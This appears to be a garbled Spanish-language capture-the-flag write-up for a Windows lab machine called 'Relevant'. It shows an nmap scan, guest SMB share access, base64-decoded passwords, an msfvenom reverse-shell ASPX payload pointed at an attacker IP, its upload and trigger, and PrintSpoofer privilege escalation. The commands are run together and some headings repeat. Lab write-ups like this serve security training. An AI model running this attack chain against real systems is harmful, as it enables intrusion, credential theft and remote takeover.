Relevant
Subir archivos por smb (READ,WRITE)






Generar un payload de tipo windows/x64/shell_reverse_tcp
windows/x64/shell_reverse_tcp 




Last updated
Subir archivos por smb (READ,WRITE)






windows/x64/shell_reverse_tcp 




Last updated
β File: targeted
ββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1 β # Nmap 7.95 scan initiated Mon Jun 9 15:10:49 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p80,135,139,445,3389,49663,49666,49667 -oN targeted 10.10.136.91
2 β Nmap scan report for 10.10.136.91
3 β Host is up (0.17s latency).
4 β
5 β PORT STATE SERVICE VERSION
6 β 80/tcp open http Microsoft IIS httpd 10.0
7 β | http-methods:
8 β |_ Potentially risky methods: TRACE
9 β |_http-server-header: Microsoft-IIS/10.0
10 β |_http-title: IIS Windows Server
11 β 135/tcp open msrpc Microsoft Windows RPC
12 β 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
13 β 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: WORKGROUP)
14 β 3389/tcp open ms-wbt-server Microsoft Terminal Services
15 β |_ssl-date: 2025-06-09T15:12:29+00:00; +1s from scanner time.
16 β | rdp-ntlm-info:
17 β | Target_Name: RELEVANT
18 β | NetBIOS_Domain_Name: RELEVANT
19 β | NetBIOS_Computer_Name: RELEVANT
20 β | DNS_Domain_Name: Relevant
21 β | DNS_Computer_Name: Relevant
22 β | Product_Version: 10.0.14393
23 β |_ System_Time: 2025-06-09T15:11:49+00:00
24 β | ssl-cert: Subject: commonName=Relevant
25 β | Not valid before: 2025-06-08T15:06:33
26 β |_Not valid after: 2025-12-08T15:06:33
27 β 49663/tcp open http Microsoft IIS httpd 10.0
28 β | http-methods:
29 β |_ Potentially risky methods: TRACE
30 β |_http-title: IIS Windows Server
31 β |_http-server-header: Microsoft-IIS/10.0
32 β 49666/tcp open msrpc Microsoft Windows RPC
33 β 49667/tcp open msrpc Microsoft Windows RPC
34 β Service Info: Host: RELEVANT; OS: Windows; CPE: cpe:/o:microsoft:windows
35 β
36 β Host script results:
37 β | smb-security-mode:
38 β | account_used: guest
39 β | authentication_level: user
40 β | challenge_response: supported
41 β |_ message_signing: disabled (dangerous, but default)
42 β | smb-os-discovery:
43 β | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
44 β | Computer name: Relevant
45 β | NetBIOS computer name: RELEVANT\x00
46 β | Workgroup: WORKGROUP\x00
47 β |_ System time: 2025-06-09T08:11:52-07:00
48 β | smb2-security-mode:
49 β | 3:1:1:
50 β |_ Message signing enabled but not required
51 β | smb2-time:
52 β | date: 2025-06-09T15:11:50
53 β |_ start_date: 2025-06-09T15:06:33
54 β |_clock-skew: mean: 1h24m01s, deviation: 3h07m51s, median: 0s
55 β
56 β Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
57 β # Nmap done at Mon Jun 9 15:12:28 2025 -- 1 IP address (1 host up) scanned in 99.30 seconds
nxc smb 10.10.136.91 -u 'guest' -p '' --sharessmbclient //10.10.11.71/nt4wrksv -U 'guest'$echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123% β― echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$% msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.2.131 LPORT=53 -f aspx -o rev.aspxsmbclient //10.10.4.55/nt4wrksv -U 'guest'http://10.10.4.55:49663/nt4wrksv/rev.aspxPrintSpoofer.exe -i -c cmd